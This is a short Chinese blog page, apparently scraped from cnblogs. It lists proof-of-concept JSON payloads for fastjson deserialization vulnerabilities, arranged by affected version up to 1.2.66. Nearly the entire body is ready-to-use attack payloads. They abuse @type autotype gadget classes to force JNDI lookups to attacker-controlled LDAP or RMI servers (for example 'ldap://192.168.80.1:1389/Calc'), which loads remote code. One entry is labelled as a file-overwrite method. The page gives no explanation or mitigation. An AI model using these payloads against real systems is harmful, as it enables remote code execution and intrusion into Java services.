zoukankan      html  css  js  c++  java

  • fastjson 反序列化漏洞

    一.漏洞POC

    fastjson<=1.2.24(CNVD-2017-02833)

    {"v24":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://0.0.0.0","autoCommit":true}}

    fastjson<=1.2.41

    {"v41":{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"ldap://0.0.0.0","autoCommit":true}}

    fastjson<=1.2.42

    {"v42":{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://0.0.0.0","autoCommit":true}}

    fastjson<=1.2.43

    {"v43":{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{"dataSourceName":"ldap://0.0.0.0","autoCommit":true]}}}

    fastjson<=1.2.45

    {"v45":{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://localhost:1389/Exploit"}}}

    {
"v45":{"@type":"java.lang.Class","val":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory"},
"xxx":{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://0.0.0.0"}}
}

    fastjson<=1.2.47(CNVD-2019-22238)

    {
    "a": {
        "@type": "java.lang.Class", 
        "val": "com.sun.rowset.JdbcRowSetImpl"
    }, 
    "b": {
        "@type": "com.sun.rowset.JdbcRowSetImpl", 
        "dataSourceName": "rmi://x.x.x.x:1098/jndi", 
        "autoCommit": true
    }}

    {
"v47":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},
"xxx":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://0.0.0.0","autoCommit":true}
}

    fastjson<=1.2.61

    {"v61_error":{"@type":"org.apache.commons.proxy.provider.remoting.SessionBeanProvider","jndiName":"rmi://127.0.0.1"}}

    {"v61_error":{"@type":"org.apache.commons.proxy.provider.remoting.SessionBeanProvider","jndiName":"ldap://127.0.0.1","Object":"a"}}

    fastjson<=1.2.62

    {"aaaa":{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"rmi://127.0.0.1:1099/exploit"}";}

    {"v62":{"@type":"org.apache.xbean.propertyeditor.JndiConverter","asText":"ldap://0.0.0.0"}}

    {"v62_error":{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"ldap://0.0.0.0"}}}

    {"v62_error":{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry":"ldap://0.0.0.0"}}

    {"v62_error":{"@type":"org.apache.cocoon.components.slide.impl.JMSContentInterceptor","parameters": {"@type":"java.util.Hashtable","java.naming.factory.initial":"com.sun.jndi.rmi.registry.RegistryContextFactory","topic-factory":"ldap://0.0.0.0"},"namespace":""}}

    fastjson<=1.2.66

    {"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://192.168.80.1:1389/Calc"}
{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://192.168.80.1:1389/Calc"}
{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://192.168.80.1:1389/Calc"}
{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"ldap://192.168.80.1:1389/Calc"}}

    写文件覆盖方法
{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","metricRegistry":"ldap://0.0.0.0"}{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","healthCheckRegistry":"ldap://0.0.0.0"}
  • 相关阅读:
    ios 人脸检测
    改善用户体验的几个alert提示效果(收集整理)
    asp.net中关于《%=》《%#》《%》 的用法——(转帖)
    flash学习网址
    网页数据表格自动填充序号
    <%#..%>与<%=..%>的区别
    用Margin还是用Padding
    由浅入深漫谈margin属性
    css中导入样式表和链接样式表有什么区别,我不是问语法,而是问内在区别,还有我怎么才能体会到他们的区别
    ASP.NET Eval如何进行数据绑定
  • 原文地址:https://www.cnblogs.com/supdon/p/15099751.html
Copyright © 2011-2022 走看看